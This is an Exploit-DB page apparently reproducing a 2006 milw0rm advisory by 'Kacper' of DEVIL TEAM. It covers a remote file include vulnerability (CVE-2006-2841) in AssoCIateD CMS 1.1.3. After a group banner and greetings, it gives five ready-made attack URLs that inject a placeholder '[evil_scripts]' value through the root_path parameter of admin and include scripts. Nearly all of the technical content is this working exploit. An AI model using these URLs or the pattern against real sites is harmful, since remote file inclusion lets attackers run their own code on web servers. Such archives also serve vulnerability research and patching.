AssoCIateD CMS 1.1.3 (root_path) Remote File Include Vulnerability



EDB-ID: 1858 CVE: 2006-2841OSVDB-ID: 26146
Author: KacperPublished: 2006-06-01Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities
# Script site: http://herve.labas.free.fr/acid/en/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts]
# milw0rm.com [2006-06-01]






Comments

No comments so far